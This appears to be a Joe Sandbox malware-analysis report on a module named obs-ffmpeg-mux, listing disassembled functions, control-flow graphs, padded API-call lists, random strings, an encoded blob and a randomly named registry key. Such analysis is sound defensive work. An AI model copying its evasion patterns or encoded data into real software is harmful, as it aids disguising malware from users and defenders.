                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Time$ConsoleLocalThread$FreeSystemWait$HandleInfo$ActiveBufferConditionErrorFileGlobalNamedPipeProcessScreenSpecificTimesTitleVolume$AffinityAllocBoostBoundaryByteCallbacksCancelCharClientCountCurrentDebugDefaultDescriptionDescriptorDiskDriveEnumEventFlagsFontFrameGroupGuaranteeHeapInformationInitializeIntegrityLabelLastLibraryLocaleMaskMemoryModeMountMultiMultipleNameObjectsOpenParamPathPointPriorityProfileQueryRectResourceSectionSemaphoreSessionSpaceStackStateStatusSynchronousTempThreadpoolTypeTypesUserVariableWideWrite
                                                            • String ID: 4fMVs978BNPf1hk89N$UeiDv92mz9hZb73XFU7gZ$Ve565npltFY2SoTHwL1$h1VLbf4R8rsjpSIGlujSL67O
                                                            • API String ID: 1813427410-1030410181
                                                            • Opcode ID: a530f8b2380662852fb634675e8832b7610bf8ecbbb91632e22c2edacc072d67
                                                            • Instruction ID: 45ada13c06151efe20d0f7981e78e7b11e2f989afd44565980d197d69f604dc7
                                                            • Opcode Fuzzy Hash: a530f8b2380662852fb634675e8832b7610bf8ecbbb91632e22c2edacc072d67
                                                            • Instruction Fuzzy Hash: 19024C76B05A4682EB18CB39E46572E6363FB8CB84F808176CA4E57BA5CE3FD4058704
                                                            Function 00007FFDA378A720 Relevance: 81.1, APIs: 37, Strings: 9, Instructions: 562threadfilesynchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 55 7ffda378a720-7ffda378a8c2 call 7ffda38211bc * 2 60 7ffda378a8c8-7ffda378a8d8 55->60 61 7ffda378a8e6-7ffda378aafd call 7ffda38211bc 60->61 62 7ffda378a8da-7ffda378a8e4 60->62 65 7ffda378ab01-7ffda378ab0f 61->65 62->60 66 7ffda378ab1d-7ffda378ab33 65->66 67 7ffda378ab11-7ffda378ab1b 65->67 68 7ffda378ab37-7ffda378ab45 66->68 67->65 69 7ffda378ab47-7ffda378ab51 68->69 70 7ffda378ab53-7ffda378abfd call 7ffda38211bc call 7ffda3796ee0 call 7ffda3797670 68->70 69->68 77 7ffda378ac45-7ffda378ac88 call 7ffda3796ee0 call 7ffda3797750 70->77 78 7ffda378abff-7ffda378ac3d call 7ffda3796ee0 call 7ffda37976e0 70->78 87 7ffda378ac89-7ffda378acf2 call 7ffda3796ee0 call 7ffda37977c0 77->87 85 7ffda378ac42-7ffda378ac43 78->85 85->87 92 7ffda378acf8-7ffda378adb9 PowerClearRequest GetTapePosition CloseThreadpool CloseThreadpoolTimer GetUserDefaultLangID LoadResource GetFileAttributesTransactedW PtInRegion GetFinalPathNameByHandleW AddFontResourceW GetTextCharset GetActiveProcessorGroupCount GetTapePosition GetWindowOrgEx SelectObject SetFileApisToOEM CreateFontIndirectExW 87->92 93 7ffda378adba-7ffda378ae1f call 7ffda3796ee0 call 7ffda37977c0 87->93 92->93 98 7ffda378ae25-7ffda378af2a CreateJobObjectW IsDBCSLeadByteEx GetConsoleCP CreateThreadpoolWork GetProcessWorkingSetSizeEx RemoveDllDirectory SetThreadPreferredUILanguages DuplicateHandle GetDefaultCommConfigW CreateHardLinkW DefineDosDeviceW AddVectoredExceptionHandler ReleaseMutex GetUserGeoID IsBadStringPtrW GetTickCount64 TerminateJobObject VerifyScripts GetFileAttributesExW GlobalMemoryStatusEx 93->98 99 7ffda378af2b-7ffda378afd9 call 7ffda3796ee0 call 7ffda37977c0 call 7ffda3796ee0 call 7ffda37977c0 93->99 98->99 107 7ffda378afde-7ffda378aff8 99->107
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Create$FileObjectThreadpool$AttributesCloseDefaultFontHandlePositionResourceTapeUser$ActiveApisByteCharsetClearCommConfigConsoleCountCount64DefineDeviceDirectoryDuplicateExceptionFinalGlobalGroupHandlerHardIndirectLangLanguagesLeadLinkLoadMemoryMutexNamePathPowerPreferredProcessProcessorRegionReleaseRemoveRequestScriptsSelectSizeStatusStringTerminateTextThreadTickTimerTransactedVectoredVerifyWindowWorkWorking
                                                            • String ID: 4viVreLo9d18Fez2HF$8$8$8$8$Operation completed successfully.$Operation failed.$TWU5iBJQri2OO5MB4dtQkXYV8$x%
                                                            • API String ID: 2562434-336710652
                                                            • Opcode ID: 36e1c3783f9b64b428ac8eff27ccf0c2b825d730ebbb142a4a55e187ae5f8664
                                                            • Instruction ID: 68950b28e18137c10c087f53c38078ec4f08743269aa25eb49c0de3dcc1bffb1
                                                            • Opcode Fuzzy Hash: 36e1c3783f9b64b428ac8eff27ccf0c2b825d730ebbb142a4a55e187ae5f8664
                                                            • Instruction Fuzzy Hash: BD420572B192418BD758CF7CE86476EB7A2FB89344F504039E68AC7B59DA7ED8048F04
                                                            Function 00007FFDA378A430 Relevance: 70.2, APIs: 34, Strings: 6, Instructions: 183threadtimefileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            • j6CQXke34N9RE3fYb3Pvl8n, xrefs: 00007FFDA378A64E
                                                            • Xw3X5gLIXCFzO15Yy3d33, xrefs: 00007FFDA378A685
                                                            • 8G9k4Lma76WgaSciAw6T55b, xrefs: 00007FFDA378A536
                                                            • tmfpSIvUxF6753H2s, xrefs: 00007FFDA378A524
                                                            • 3qFfCcgD/1EYhQoBA+nCL4uKrSB2zlV8YcHsDEbxo9MFzlIbQGWyoXmjPYKy480XQzNCC20WHI+jpaPkDlkjMFA4mA5WYnOp8yOu9iL8Rsco+RbrzGSWkgQDX7FqdQoqER/xS3LxBQUoQn1J+XdGuYwVUabOd33VJ52FhwVTpj63wyiYK6YIxRt769d/9NZza7BAi89blCIIT18xK+7IZdYRrmmynxjQJU7dYu/24/ACJ1OhFfpubsYE6dqStTG2rTiq, xrefs: 00007FFDA378A455
                                                            • ab8p475zojzksO4, xrefs: 00007FFDA378A6BC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: File$ThreadTime$Create$ExitFreeThreadpool$ConsoleFindInfoLibraryListNameOpenProcessValidVersion$ActiveApplicationBufferCallbackCallbacksChangeClassCleanupCloseCodeCompletionCriticalEnterEntryEventFirstFullGlobalGroupHistoryImageInformationInterlockedLinkLoadLocalLocaleMemoryModuleNotificationPowerPrefetchPriorityPushQueryQueuedRecoveryRegisterRequestScreenSectionSelectorSizeStackStatusSymbolicSystemTerminateTransactedVirtualWaitWorkWow64
                                                            • String ID: 3qFfCcgD/1EYhQoBA+nCL4uKrSB2zlV8YcHsDEbxo9MFzlIbQGWyoXmjPYKy480XQzNCC20WHI+jpaPkDlkjMFA4mA5WYnOp8yOu9iL8Rsco+RbrzGSWkgQDX7FqdQoqER/xS3LxBQUoQn1J+XdGuYwVUabOd33VJ52FhwVTpj63wyiYK6YIxRt769d/9NZza7BAi89blCIIT18xK+7IZdYRrmmynxjQJU7dYu/24/ACJ1OhFfpubsYE6dqStTG2rTiq$8G9k4Lma76WgaSciAw6T55b$Xw3X5gLIXCFzO15Yy3d33$ab8p475zojzksO4$j6CQXke34N9RE3fYb3Pvl8n$tmfpSIvUxF6753H2s
                                                            • API String ID: 2897069635-878317460
                                                            • Opcode ID: 409bc04082ec80ca9a793320c8c1970d6722e4646ad8771e6aff88865e4a4919
                                                            • Instruction ID: 9c8c1f9c95fda2178dac177ef4e5f01b61e73a3a435cdc15a197ef86fbd058bf
                                                            • Opcode Fuzzy Hash: 409bc04082ec80ca9a793320c8c1970d6722e4646ad8771e6aff88865e4a4919
                                                            • Instruction Fuzzy Hash: 59811E36B15A1682EB18DF35E875A3E2263EF8C745F818475C90F5ABA5CE3FD0458704
                                                            Function 00007FFDA3785730 Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 210timememoryfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Timer$FileFind$ConsoleCreateDeleteHandleNextOpenPointProcessQueueTransactedVersionWindow$AllocBandwidthBarrierBoundaryClipboardCommContextCriticalCursorDescriptorDirectoryEnterFirstFocusGlobalHelpLogicalMountOutputPhysicalPropertiesReadRemoveReservationSectionShowStreamSynchronizationTapemarkTitleVirtualVolumeWaitableWrite
                                                            • String ID: x
                                                            • API String ID: 1620229001-618964285
                                                            • Opcode ID: f87dd8e41ce6483989a590ec29bb05b1d62e809659f9fda5e6a0d3ed9b5d3f70
                                                            • Instruction ID: f62ba0327b7a06c29f002e279905e71faf7b29a71741dbd7a71d13607543bad3
                                                            • Opcode Fuzzy Hash: f87dd8e41ce6483989a590ec29bb05b1d62e809659f9fda5e6a0d3ed9b5d3f70
                                                            • Instruction Fuzzy Hash: 54A17C32B0968582EB68CB31E46576F73A2FB88354F808439D68E56F99CF7FD0448B04
                                                            Function 00007FFDA378B8D0 Relevance: 18.1, APIs: 12, Instructions: 123filewindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Create$FileQuery$BarrierBitmapBufferCharConsoleCurrentDeleteFiberFindIndirectInitializeMappingMemoryMountNamesNextNotificationPointPrivateProcessProfileResourceScreenSectionSynchronizationUnlockVirtualVolumeWidth
                                                            • String ID:
                                                            • API String ID: 211411654-0
                                                            • Opcode ID: 6d8afccd1d2c080f849b57737f0f17a57049f5d71e49d6924da8063b6094f735
                                                            • Instruction ID: 38120934d8b990806adfbe71e57fb7b5c3bbf60bf54ec0b3c07ed53b76ba7707
                                                            • Opcode Fuzzy Hash: 6d8afccd1d2c080f849b57737f0f17a57049f5d71e49d6924da8063b6094f735
                                                            • Instruction Fuzzy Hash: C7516B32B2965187E754CF39F865B2E77A2FB88304F805136FA8A86B55CF3ED4048B04
                                                            Function 00007FFDA378A1D0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 120registrysynchronizationCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::EmptyQueue::StructuredWork$Create$Char_traitsCloseMutexValue
                                                            • String ID: SOFTWARE\pzruyfrcqocvcuiasjrccsy$qhmninsnzasudnedn$ycsepmubxbtwkolmtv
                                                            • API String ID: 1362858086-771951700
                                                            • Opcode ID: 39f06f3d5dfad09abccc3109071f6f931abc7924bbe5b8c646441f8380735ffc
                                                            • Instruction ID: 5a57badae4f45df306513fef578465e5849820c40069786b4c8c4e12456b37cc
                                                            • Opcode Fuzzy Hash: 39f06f3d5dfad09abccc3109071f6f931abc7924bbe5b8c646441f8380735ffc
                                                            • Instruction Fuzzy Hash: 2651623161EAC1C6EA60DB60F4603AEB362FBC5355F404132E68D92BAADF6DD585CB04
                                                            Function 00007FFDA3817E24 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 202 7ffda3817e24-7ffda3817e2a 203 7ffda3817e65-7ffda3817e6f 202->203 204 7ffda3817e2c-7ffda3817e2f 202->204 207 7ffda3817f8c-7ffda3817fa1 203->207 205 7ffda3817e31-7ffda3817e34 204->205 206 7ffda3817e59-7ffda3817e91 call 7ffda3817bec 204->206 208 7ffda3817e36-7ffda3817e39 205->208 209 7ffda3817e4c __scrt_dllmain_crt_thread_attach 205->209 221 7ffda3817e96-7ffda3817e98 206->221 210 7ffda3817fb0-7ffda3817fca call 7ffda3817a80 207->210 211 7ffda3817fa3 207->211 213 7ffda3817e45-7ffda3817e4a call 7ffda3817b30 208->213 214 7ffda3817e3b-7ffda3817e44 208->214 217 7ffda3817e51-7ffda3817e58 209->217 225 7ffda3817fff-7ffda3818030 call 7ffda3818594 210->225 226 7ffda3817fcc-7ffda3817ffd call 7ffda3817ba8 call 7ffda3818798 call 7ffda381880c call 7ffda3817d4c call 7ffda3817d70 call 7ffda3817bd8 210->226 215 7ffda3817fa5-7ffda3817faf 211->215 213->217 222 7ffda3817e9e-7ffda3817eb3 call 7ffda3817a80 221->222 223 7ffda3817f66 221->223 234 7ffda3817f7e-7ffda3817f8b call 7ffda3818594 222->234 235 7ffda3817eb9-7ffda3817eca call 7ffda3817af0 222->235 227 7ffda3817f68-7ffda3817f7d 223->227 236 7ffda3818041-7ffda3818047 225->236 237 7ffda3818032-7ffda3818038 225->237 226->215 234->207 253 7ffda3817f1b-7ffda3817f25 call 7ffda3817d4c 235->253 254 7ffda3817ecc-7ffda3817ef0 call 7ffda38187d0 call 7ffda3818788 call 7ffda38187ac call 7ffda3829420 235->254 242 7ffda3818049-7ffda3818053 236->242 243 7ffda3818089-7ffda3818091 call 7ffda378cc80 236->243 237->236 241 7ffda381803a-7ffda381803c 237->241 248 7ffda3818126-7ffda3818133 241->248 249 7ffda3818055-7ffda3818058 242->249 250 7ffda381805a-7ffda3818060 242->250 255 7ffda3818096-7ffda381809f 243->255 256 7ffda3818062-7ffda3818068 249->256 250->256 253->223 276 7ffda3817f27-7ffda3817f33 call 7ffda38187c8 253->276 254->253 304 7ffda3817ef2-7ffda3817ef9 __scrt_dllmain_after_initialize_c 254->304 263 7ffda38180a1-7ffda38180a3 255->263 264 7ffda38180d7-7ffda38180d9 255->264 259 7ffda381806e-7ffda3818076 call 7ffda3817e24 256->259 260 7ffda381811c-7ffda3818124 256->260 275 7ffda381807b-7ffda3818083 259->275 260->248 263->264 271 7ffda38180a5-7ffda38180c7 call 7ffda378cc80 call 7ffda3817f8c 263->271 266 7ffda38180e0-7ffda38180f5 call 7ffda3817e24 264->266 267 7ffda38180db-7ffda38180de 264->267 266->260 285 7ffda38180f7-7ffda3818101 266->285 267->260 267->266 271->264 299 7ffda38180c9-7ffda38180ce 271->299 275->243 275->260 292 7ffda3817f35-7ffda3817f3f call 7ffda3817cb4 276->292 293 7ffda3817f59-7ffda3817f64 276->293 290 7ffda3818103-7ffda3818106 285->290 291 7ffda3818108-7ffda3818116 285->291 296 7ffda3818118 290->296 291->296 292->293 303 7ffda3817f41-7ffda3817f4f 292->303 293->227 296->260 299->264 303->293 304->253 305 7ffda3817efb-7ffda3817f18 call 7ffda38293dc 304->305 305->253
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 190073905-0
                                                            • Opcode ID: 885b1372c4ac6e252af6f8e66040fcee7ecb067237b4b5e5498a149560df340e
                                                            • Instruction ID: 18b6d7957fff0a5d9d64662de1690065986f50d1d9657d6638c914f469adf115
                                                            • Opcode Fuzzy Hash: 885b1372c4ac6e252af6f8e66040fcee7ecb067237b4b5e5498a149560df340e
                                                            • Instruction Fuzzy Hash: 4881D221F0E24742FA50AB35986227A62D3AF85780F5444B9EA0D737D7DF3FE9418308
                                                            Function 00007FFDA382BB2C Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: FileHandleType
                                                            • String ID:
                                                            • API String ID: 3000768030-0
                                                            • Opcode ID: 7886f18d25acb83806fc9ae5e0890180e5f85731691ffc7f8f8f9a5d69d29a06
                                                            • Instruction ID: 0b1f78767dd075111b331ae8513d53a58e823c01f356ae0d9b5a66ce8ac94321
                                                            • Opcode Fuzzy Hash: 7886f18d25acb83806fc9ae5e0890180e5f85731691ffc7f8f8f9a5d69d29a06
                                                            • Instruction Fuzzy Hash: 6231DB22B1AB4682E7618F3484A01782652FB45BB0F680779EB7E173E5CF3BE451D305
                                                            Function 00007FFDA379C620 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_NameName::SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 3936588866-0
                                                            • Opcode ID: 30c079df398d5b2e3d5503d7e36682e68b9a20734315ede24bf96e024609b5c8
                                                            • Instruction ID: 13bc83a492434e595649863eeba81cab75bc1184f1a34f3ede31072adb88d960
                                                            • Opcode Fuzzy Hash: 30c079df398d5b2e3d5503d7e36682e68b9a20734315ede24bf96e024609b5c8
                                                            • Instruction Fuzzy Hash: 7D212A227195C556DA70D615E8613DBB3D2F7C87C0F819931DA8D83B69EE2DCA44CF00
                                                            Function 00007FFDA379D410 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_NameName::SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 3936588866-0
                                                            • Opcode ID: 48d6e1b7960a9ac3cebdc0c050fdb7a731a13dc49d4e3fd72ce479534f36db21
                                                            • Instruction ID: 169884d101489245491ac3bcca0aa3e1d2d4c88fb5886860a02bdf63fc22c3ae
                                                            • Opcode Fuzzy Hash: 48d6e1b7960a9ac3cebdc0c050fdb7a731a13dc49d4e3fd72ce479534f36db21
                                                            • Instruction Fuzzy Hash: 0E2145627195C456DA70DA15E8603DAA3A3F7C87D0FC18931EACD83B69ED2DCA08CB00
                                                            Function 00007FFDA379BFB0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FFDA379EDA0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379EE16
                                                            • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDA379BFF9
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::_Fac_nodeFac_node::_SchedulerScheduler::_std::_
                                                            • String ID:
                                                            • API String ID: 2050660017-0
                                                            • Opcode ID: 9049369542d94e38dfe0327c516c39202767922d134a888ab07566f7817e02ff
                                                            • Instruction ID: be8dfa1bf037c804932c0998a60a56df04b6d4273b89b118df6749fd9b1a0b1f
                                                            • Opcode Fuzzy Hash: 9049369542d94e38dfe0327c516c39202767922d134a888ab07566f7817e02ff
                                                            • Instruction Fuzzy Hash: 1921302271AAC495DAA0DB15F45039AB3A2F7C57C0F805431EACD83B69EE3DC554CB00
                                                            Function 00007FFDA379BD00 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FFDA379ECD0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA379ED46
